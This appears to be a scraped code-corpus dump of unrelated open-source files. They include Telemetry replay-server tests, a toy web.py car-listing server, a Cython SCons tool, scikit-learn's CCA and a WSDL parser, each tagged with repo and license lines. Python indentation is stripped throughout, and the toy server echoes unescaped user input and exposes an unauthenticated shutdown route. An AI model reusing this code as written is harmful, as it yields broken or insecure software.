self.assertIsNone(old_forwarder.port_pairs)
self.assertTrue(b.is_open) # Controller is still open.
b.Close()
self.assertFalse(b.is_open)
def testClosingControllerAlsoStopsReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
self.assertIsNotNone(b.forwarder.port_pairs)
old_replay_server = b.replay_server
old_forwarder = b.forwarder
b.Close()
self.assertFalse(b.is_replay_active)
self.assertFalse(old_replay_server.is_running)
self.assertIsNone(old_forwarder.port_pairs)
self.assertFalse(b.is_open)
def testReplayOnClosedControllerRaises(self):
b = self.network_controller_backend
self.assertFalse(b.is_open)
with self.assertRaises(AssertionError):
b.StartReplay('some-archive.wpr')
def testReplayWithSameArgsReuseServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertIs(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
def testReplayWithDifferentArgsUseDifferentServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay('another-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertIsNot(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
self.assertFalse(old_replay_server.is_running)
def testReplayWithoutArchivePathDoesNotStopReplay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertTrue(b.is_replay_active)
self.assertTrue(b.replay_server.is_running)
old_replay_server = b.replay_server
b.StartReplay(None)
self.assertTrue(b.is_replay_active)
self.assertIs(b.replay_server, old_replay_server)
self.assertTrue(b.replay_server.is_running)
self.assertEqual(b.replay_server.archive_path, 'some-archive.wpr')
def testModeOffDoesNotCreateReplayServer(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_OFF, '3g', ['--some-arg'])
b.StartReplay('may-or-may-not-exist.wpr')
self.assertFalse(b.is_replay_active)
self.assertIsNone(b.replay_server)
self.assertIsNone(b.forwarder)
def testBadArchivePathRaises(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
with self.assertRaises(network_controller_backend.ArchiveDoesNotExistError):
b.StartReplay('does-not-exist.wpr')
def testBadArchivePathOnRecordIsOkay(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_RECORD, '3g', ['--some-arg'])
b.StartReplay('does-not-exist-yet.wpr') # Does not raise.
self.assertTrue(b.is_replay_active)
def testReplayServerSettings(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_RECORD, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
# Externally visible properties
self.assertTrue(b.is_replay_active)
self.assertEqual(b.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.wpr_device_ports, DEFAULT_PORTS)
# Private replay server settings.
self.assertTrue(b.replay_server.is_running)
self.assertEqual(b.replay_server.archive_path, 'some-archive.wpr')
self.assertEqual(b.replay_server.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.replay_server.replay_args, [
'--some-arg', '--net=3g', '--record', '--inject_scripts=',
'--should_generate_certs',
'--https_root_ca_cert_path=%s' % EXPECTED_WPR_CA_CERT_PATH])
def testReplayServerOffSettings(self):
b = self.network_controller_backend
b.platform_backend.wpr_ca_cert_path = 'CERT_FILE'
b.Open(wpr_modes.WPR_OFF, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertFalse(b.is_replay_active)
self.assertEqual(b.host_ip, FORWARDER_HOST_IP)
self.assertEqual(b.wpr_device_ports, None)
self.assertIsNone(b.replay_server)
def testUseDefaultPorts(self):
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, DEFAULT_PORTS)
self.assertEqual(b.wpr_device_ports, DEFAULT_PORTS)
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testUseDefaultLocalPorts(self):
b = self.network_controller_backend
b.platform_backend.SetWprPortPairs(
http=(0, 8888), https=(0, 4444), dns=(0, 2222))
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, DEFAULT_PORTS)
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(8888, 4444, 2222))
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testUseSpecificPorts(self):
b = self.network_controller_backend
b.platform_backend.SetWprPortPairs(
http=(88, 8888), https=(44, 4444), dns=None)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.replay_server.ports, forwarders.PortSet(88, 44, None))
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(8888, 4444, None))
# Invariant
self.assertEqual(b.forwarder.port_pairs.local_ports, b.replay_server.ports)
self.assertEqual(b.forwarder.port_pairs.remote_ports, b.wpr_device_ports)
def testRestartReplayShouldReusePorts(self):
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(123, 456, 789)
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
# If replay restarts, the factory may use a different set of default ports.
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(987, 654, 321)
b.StartReplay('another-archive.wpr')
# However same ports must be used, because apps/browsers may already be
# configured to use the old set of ports.
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
def testNewControllerSessionMayUseDifferentPorts(self):
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(123, 456, 789)
b = self.network_controller_backend
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(123, 456, 789))
b.Close()
# If replay restarts, the factory may use a different set of default ports.
FakeReplayServer.DEFAULT_PORTS = forwarders.PortSet(987, 654, 321)
b.Open(wpr_modes.WPR_REPLAY, '3g', ['--some-arg'])
b.StartReplay('some-archive.wpr')
# This time the network controller session was closed between replay's,
# so it's fine to use a different set of ports.
self.assertEqual(b.wpr_device_ports, forwarders.PortSet(987, 654, 321))
|
bsd-3-clause
|
kylepolich/sandbox
|
andrew/example.py
|
1
|
2031
|
#!/usr/bin/python
import daemon
import web
import sys
import os
port=8081
header = '<html><body><a href="/car/list">List</a> | <a href="/car/set">Set</a> | <a href="/goodbye">Terminate Server</a><br/>'
footer = '</body></html>'
class hello:
def GET(self):
return header + footer
class car_list:
def GET(self):
bdy = header + 'Cars:<br/><br/>'
if os.path.isfile(saveFile):
f = open(saveFile, 'r')
lines = f.readlines()
for line in lines:
bdy += line.replace('\n', '<br/>').replace('\t', ' = ')
else:
bdy += 'None yet'
bdy += footer
return bdy
class car_set:
def GET(self):
return header + '<form action="/car/set" method="post">Make and Model: <input name="name" /> Price: <input name="price" /><input type="submit" /></form>' + footer
def POST(self):
i = web.input()
name = i.name
price = i.price
f = open(saveFile, 'a')
f.write(name)
f.write('\t')
f.write(price)
f.write('\n')
return header + 'Done. Do another.<br/><br/><form action="/car/set" method="post">Make and Model: <input name="name" /> Price: <input name="price" /><input type="submit" /></form>' + footer
class goodbye:
def GET(self):
app.stop()
return '<html><body>Goodbye</body></html>'
class error:
def GET(self, req):
return 'error'
def POST(self):
return 'error'
class MyApplication(web.application):
def run(self, port=port, *middleware):
func = self.wsgifunc(*middleware)
return web.httpserver.runsimple(func, ('0.0.0.0', port))
if __name__ == "__main__":
if (len(sys.argv) != 2 or sys.argv[1]==''):
print "USAGE: one parameter specifying the file where you want to store data"
raise SystemExit
global saveFile
saveFile = sys.argv.pop()
urls = (
'/', 'hello',
'/car/list', 'car_list',
'/car/set', 'car_set',
'/goodbye', 'goodbye',
'/(.*)', 'error'
)
app = MyApplication(urls, globals())
with daemon.DaemonContext():
app.run(port=port)
|
cc0-1.0
|
ricotabor/opendrop
|
site_scons/site_tools/cython.py
|
2
|
8689
|
import os
import re
import shlex
import subprocess
from SCons.Scanner import FindPathDirs
from SCons.Script import Action, Builder
def exists(env):
return env.Detect('cython')
def generate(env):
env.Tool('python')
env.SetDefault(CYTHONPATH=[])
env['BUILDERS']['Cython'] = Builder(
action=Action(
cython_build_action,
strfunction=cython_build_strfunction,
),
suffix='.cpp',
src_suffix='.pyx',
)
scanner = env.Scanner(
function=cython_scan,
skeys=['.pyx', '.pyd', '.pyi'],
path_function=lambda *args: (
FindPathDirs('PYTHONPATH')(*args)
+ FindPathDirs('CYTHONPATH')(*args)
),
recursive=True,
)
env.Append(SCANNERS=scanner)
def cython_build_action(target, source, env):
try:
subprocess.check_call(cython_build_command(target, source, env))
except subprocess.CalledProcessError:
if os.path.isfile(target[0].abspath):
os.remove(target[0].abspath)
return 1
def cython_build_strfunction(target, source, env):
if getattr(shlex, 'join', None):
return shlex.join(cython_build_command(target, source, env))
else:
# XXX: For Python 3.6 compatibility.
return ' '.join(shlex.quote(s) for s in cython_build_command(target, source, env))
def cython_build_command(target, source, env):
flags = ['-3']
flags += ['-I' + str(p) for p in env['CYTHONPATH']]
if target[0].get_suffix() == '.cpp':
flags.append('--cplus')
return [
env.subst('$PYTHON'),
'-m',
'cython',
*flags,
'-o',
*env.subst(['$TARGET', '$SOURCE'], target=target, source=source),
]
def cython_scan(node, env, path):
deps = []
contents = node.get_text_contents()
cimports, includes, externs = extract_dependencies(contents)
for cimport in cimports:
dep = find_pdx(cimport, node, env, path)
if dep is not None:
deps += dep
for include in includes:
dep = env.FindFile(include, path)
if dep is not None:
deps.append(dep)
return deps
def find_pdx(modulename, imported_from, env, search_dirs):
*parents, base = modulename.split('.')
if parents and parents[0] == '':
path = imported_from
i = 0
for i, package in enumerate(parents):
if package != '': break
path = path.Dir('..')
return find_pdx_in_dir('.'.join([*parents[i:], base]), env, path)
for path in search_dirs:
deps = find_pdx_in_dir(modulename, env, path)
if deps:
break
else:
return []
return deps
def find_pdx_in_dir(modulename, env, directory):
deps = []
*parents, base = modulename.split('.')
if base == '':
return None
path = directory
if len(parents) > 1:
for p in parents[:-1]:
next_path = path.Dir(p)
if next_path.exists():
path = next_path
package = env.FindFile('__init__.pxd', path)
if package is not None:
deps.append(package)
else:
return []
if len(parents) > 0:
next_path = path.Dir(parents[-1])
if next_path.exists():
package = env.FindFile('__init__.pxd', next_path)
if package is not None:
deps.append(package)
path = next_path
else:
module = env.FindFile(parents[-1] + '.pxd', next_path)
if module is not None:
deps.append(module)
return deps
module = env.FindFile(base + '.pxd', path)
if module is not None:
deps.append(module)
return deps
# Taken from Cython codebase.
dependency_regex = re.compile(
r"(?:^\s*from +([0-9a-zA-Z_.]+) +cimport)|"
r"(?:^\s*cimport +([0-9a-zA-Z_.]+(?: *, *[0-9a-zA-Z_.]+)*))|"
r"(?:^\s*cdef +extern +from +['\"]([^'\"]+)['\"])|"
r"(?:^\s*include +['\"]([^'\"]+)['\"])",
re.M
)
dependency_after_from_regex = re.compile(
r"^"
r"(?:\\\n|[^S\n]*)*"
r"\((\s*"
r"(?:"
+ r"[^()\\\n]*"
+ r"\s*(?:\s*#.*|\s*\\\n)*\s*" # Line continuation or comment.
+ r","
+ r"\s*(?:\s*#.*|\s*\\\n)*\s*"
r")*"
r"(?:"
+ r"[^()\\\n]*"
+ r"\s*(?:\s*#.*|\s*\\\n)*"
r")?"
r"\s*)\)"
r"|"
r"^((?:[^()\\\n]*(?:\\\n))*(?:[^()\\\n]*(?:\n|$)))"
)
# Taken from Cython codebase.
def extract_dependencies(code):
source, literals = escape_string_literals(code)
source = source.replace('\\\n', ' ').replace('\t', ' ')
cimports = []
includes = []
externs = []
for m in dependency_regex.finditer(source):
cimport_from, cimport_list, extern, include = m.groups()
if cimport_from:
cimports.append(cimport_from)
m_after_from = dependency_after_from_regex.search(source[m.end():])
if m_after_from:
multi_line, one_line = m_after_from.groups()
subimports = multi_line or one_line
# Remove line continuations.
subimports = subimports.replace('\\', '')
# Remove comments.
subimports = re.sub(r"#.*", '', subimports)
# Remove aliases and split to list.
subimports = [re.sub("as .*", '', s, re.DOTALL).strip() for s in subimports.split(',')]
cimports.extend(
"{0}.{1}".format(
re.sub(r"\.$", '', cimport_from),
subimport
)
for subimport in subimports
)
elif cimport_list:
cimports.extend(x.strip() for x in cimport_list.split(","))
elif extern:
externs.append(literals[extern])
else:
includes.append(literals[include])
return cimports, includes, externs
# Taken from Cython codebase.
def escape_string_literals(code, prefix='__Pyx_L'):
"""
Normalizes every string literal to be of the form '__Pyx_Lxxx_',
returning the normalized code and a mapping of labels to
string literals.
"""
new_code = []
literals = {}
counter = 0
start = q = 0
in_quote = False
hash_mark = single_q = double_q = -1
code_len = len(code)
quote_type = None
quote_len = -1
while True:
if hash_mark < q:
hash_mark = code.find('#', q)
if single_q < q:
single_q = code.find("'", q)
if double_q < q:
double_q = code.find('"', q)
q = min(single_q, double_q)
if q == -1:
q = max(single_q, double_q)
# We're done.
if q == -1 and hash_mark == -1:
new_code.append(code[start:])
break
# Try to close the quote.
elif in_quote:
if code[q-1] == u'\\':
k = 2
while q >= k and code[q-k] == u'\\':
k += 1
if k % 2 == 0:
q += 1
continue
if code[q] == quote_type and (
quote_len == 1 or (code_len > q + 2 and quote_type == code[q+1] == code[q+2])):
counter += 1
label = "%s%s_" % (prefix, counter)
literals[label] = code[start+quote_len:q]
full_quote = code[q:q+quote_len]
new_code.append(full_quote)
new_code.append(label)
new_code.append(full_quote)
q += quote_len
in_quote = False
start = q
else:
q += 1
# Process comment.
elif -1 != hash_mark and (hash_mark < q or q == -1):
new_code.append(code[start:hash_mark+1])
end = code.find('\n', hash_mark)
counter += 1
label = "%s%s_" % (prefix, counter)
if end == -1:
end_or_none = None
else:
end_or_none = end
literals[label] = code[hash_mark+1:end_or_none]
new_code.append(label)
if end == -1:
break
start = q = end
# Open the quote.
else:
if code_len >= q+3 and (code[q] == code[q+1] == code[q+2]):
quote_len = 3
else:
quote_len = 1
in_quote = True
quote_type = code[q]
new_code.append(code[start:q])
start = q
q += quote_len
return "".join(new_code), literals
|
gpl-2.0
|
iDTLabssl/kitsune
|
kitsune/settings_test.py
|
16
|
1298
|
# The test system uses this to override settings in settings.py and
# settings_local.py with settings appropriate for testing.
import os
ES_LIVE_INDEXING = False
ES_INDEX_PREFIX = 'sumotest'
ES_INDEXES = {
'default': 'test-default',
'non-critical': 'test-non-critical',
'metrics': 'test-metrics',
}
ES_WRITE_INDEXES = ES_INDEXES
# Make sure Celery is EAGER.
CELERY_ALWAYS_EAGER = True
# Make sure we use port 6383 db 2 redis for tests. That's db 2 of the
# redis test config. That shouldn't collide with anything else.
REDIS_BACKENDS = {
'default': 'redis://localhost:6383?socket_timeout=0.5&db=2',
'karma': 'redis://localhost:6383?socket_timeout=0.5&db=2',
'helpfulvotes': 'redis://localhost:6383?socket_timeout=0.5&db=2',
}
# Some cron jobs are skipped on stage.
STAGE = False
SESSION_COOKIE_SECURE = False
# The way we do live server test cases is greedy with ports. This gives
# it more ports, but won't clobber settings from the environment.
if 'DJANGO_LIVE_TEST_SERVER_ADDRESS' not in os.environ:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = 'localhost:8081-8090'
# Tells django-axes we aren't behind a reverse proxy.
AXES_BEHIND_REVERSE_PROXY = False
# Make sure pipeline is enabled so it does not collectstatic on every test
PIPELINE_ENABLED = True
|
bsd-3-clause
|
xubenben/scikit-learn
|
sklearn/cross_decomposition/cca_.py
|
209
|
3150
|
from .pls_ import _PLS
__all__ = ['CCA']
class CCA(_PLS):
"""CCA Canonical Correlation Analysis.
CCA inherits from PLS with mode="B" and deflation_mode="canonical".
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, (default 2).
number of components to keep.
scale : boolean, (default True)
whether to scale the data?
max_iter : an integer, (default 500)
the maximum number of iterations of the NIPALS inner loop
tol : non-negative real, default 1e-06.
the tolerance used in the iterative algorithm
copy : boolean
Whether the deflation be done on a copy. Let the default value
to True unless you don't care about side effects
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component.
Notes
-----
For each component k, find the weights u, v that maximizes
max corr(Xk u, Yk v), such that ``|u| = |v| = 1``
Note that it maximizes only the correlations between the scores.
The residual matrix of X (Xk+1) block is obtained by the deflation on the
current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current Y score.
Examples
--------
>>> from sklearn.cross_decomposition import CCA
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [3.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
>>> cca = CCA(n_components=1)
>>> cca.fit(X, Y)
... # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
CCA(copy=True, max_iter=500, n_components=1, scale=True, tol=1e-06)
>>> X_c, Y_c = cca.transform(X, Y)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
In french but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
See also
--------
PLSCanonical
PLSSVD
"""
def __init__(self, n_components=2, scale=True,
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="canonical", mode="B",
norm_y_weights=True, algorithm="nipals",
max_iter=max_iter, tol=tol, copy=copy)
|
bsd-3-clause
|
Buckmarble/Elite_Lunar_kernel
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
vladikr/nova_drafts
|
nova/db/sqlalchemy/migrate_repo/versions/252_add_instance_extra_table.py
|
29
|
2574
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate import ForeignKeyConstraint
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Index
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import Text
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
columns = [
(('created_at', DateTime), {}),
(('updated_at', DateTime), {}),
(('deleted_at', DateTime), {}),
(('deleted', Integer), {}),
(('id', Integer), dict(primary_key=True, nullable=False)),
(('instance_uuid', String(length=36)), dict(nullable=False)),
(('numa_topology', Text), dict(nullable=True)),
]
for prefix in ('', 'shadow_'):
instances = Table(prefix + 'instances', meta, autoload=True)
basename = prefix + 'instance_extra'
if migrate_engine.has_table(basename):
continue
_columns = tuple([Column(*args, **kwargs)
for args, kwargs in columns])
table = Table(basename, meta, *_columns, mysql_engine='InnoDB',
mysql_charset='utf8')
table.create()
# Index
instance_uuid_index = Index(basename + '_idx',
table.c.instance_uuid)
instance_uuid_index.create(migrate_engine)
# Foreign key
if not prefix:
fkey_columns = [table.c.instance_uuid]
fkey_refcolumns = [instances.c.uuid]
instance_fkey = ForeignKeyConstraint(
columns=fkey_columns, refcolumns=fkey_refcolumns)
instance_fkey.create()
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
for prefix in ('', 'shadow_'):
table_name = prefix + 'instance_extra'
if migrate_engine.has_table(table_name):
instance_extra = Table(table_name, meta, autoload=True)
instance_extra.drop()
|
apache-2.0
|
yeyuexia/shadowsocks
|
setup.py
|
929
|
1321
|
import codecs
from setuptools import setup
with codecs.open('README.rst', encoding='utf-8') as f:
long_description = f.read()
setup(
name="shadowsocks",
version="2.8.2",
license='http://www.apache.org/licenses/LICENSE-2.0',
description="A fast tunnel proxy that help you get through firewalls",
author='clowwindy',
author_email='[email protected]',
url='https://github.com/shadowsocks/shadowsocks',
packages=['shadowsocks', 'shadowsocks.crypto'],
package_data={
'shadowsocks': ['README.rst', 'LICENSE']
},
install_requires=[],
entry_points="""
[console_scripts]
sslocal = shadowsocks.local:main
ssserver = shadowsocks.server:main
""",
classifiers=[
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Internet :: Proxy Servers',
],
long_description=long_description,
)
|
apache-2.0
|
grantcoin/grantcoin-new
|
contrib/p2pool/wstools/WSDLTools.py
|
292
|
60641
|
# Copyright (c) 2001 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
ident = "$Id$"
import weakref
from cStringIO import StringIO
from Namespaces import OASIS, XMLNS, WSA, WSA_LIST, WSAW_LIST, WSRF_V1_2, WSRF
from Utility import Collection, CollectionNS, DOM, ElementProxy, basejoin
from XMLSchema import XMLSchema, SchemaReader, WSDLToolsAdapter
class WSDLReader:
"""A WSDLReader creates WSDL instances from urls and xml data."""
# Custom subclasses of WSDLReader may wish to implement a caching
# strategy or other optimizations. Because application needs vary
# so widely, we don't try to provide any caching by default.
def loadFromStream(self, stream, name=None):
"""Return a WSDL instance loaded from a stream object."""
document = DOM.loadDocument(stream)
wsdl = WSDL()
if name:
wsdl.location = name
elif hasattr(stream, 'name'):
wsdl.location = stream.name
wsdl.load(document)
return wsdl
def loadFromURL(self, url):
"""Return a WSDL instance loaded from the given url."""
document = DOM.loadFromURL(url)
wsdl = WSDL()
wsdl.location = url
wsdl.load(document)
return wsdl
def loadFromString(self, data):
"""Return a WSDL instance loaded from an xml string."""
return self.loadFromStream(StringIO(data))
def loadFromFile(self, filename):
"""Return a WSDL instance loaded from the given file."""
file = open(filename, 'rb')
try:
wsdl = self.loadFromStream(file)
finally:
file.close()
return wsdl
class WSDL:
"""A WSDL object models a WSDL service description. WSDL objects
may be created manually or loaded from an xml representation
using a WSDLReader instance."""
def __init__(self, targetNamespace=None, strict=1):
self.targetNamespace = targetNamespace or 'urn:this-document.wsdl'
self.documentation = ''
self.location = None
self.document = None
self.name = None
self.services = CollectionNS(self)
self.messages = CollectionNS(self)
self.portTypes = CollectionNS(self)
self.bindings = CollectionNS(self)
self.imports = Collection(self)
self.types = Types(self)
self.extensions = []
self.strict = strict
def __del__(self):
if self.document is not None:
self.document.unlink()
version = '1.1'
def addService(self, name, documentation='', targetNamespace=None):
if self.services.has_key(name):
raise WSDLError(
'Duplicate service element: %s' % name
)
item = Service(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.services[name] = item
return item
def addMessage(self, name, documentation='', targetNamespace=None):
if self.messages.has_key(name):
raise WSDLError(
'Duplicate message element: %s.' % name
)
item = Message(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.messages[name] = item
return item
def addPortType(self, name, documentation='', targetNamespace=None):
if self.portTypes.has_key(name):
raise WSDLError(
'Duplicate portType element: name'
)
item = PortType(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.portTypes[name] = item
return item
def addBinding(self, name, type, documentation='', targetNamespace=None):
if self.bindings.has_key(name):
raise WSDLError(
'Duplicate binding element: %s' % name
)
item = Binding(name, type, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.bindings[name] = item
return item
def addImport(self, namespace, location):
item = ImportElement(namespace, location)
self.imports[namespace] = item
return item
def toDom(self):
""" Generate a DOM representation of the WSDL instance.
Not dealing with generating XML Schema, thus the targetNamespace
of all XML Schema elements or types used by WSDL message parts
needs to be specified via import information items.
"""
namespaceURI = DOM.GetWSDLUri(self.version)
self.document = DOM.createDocument(namespaceURI ,'wsdl:definitions')
# Set up a couple prefixes for easy reading.
child = DOM.getElement(self.document, None)
child.setAttributeNS(None, 'targetNamespace', self.targetNamespace)
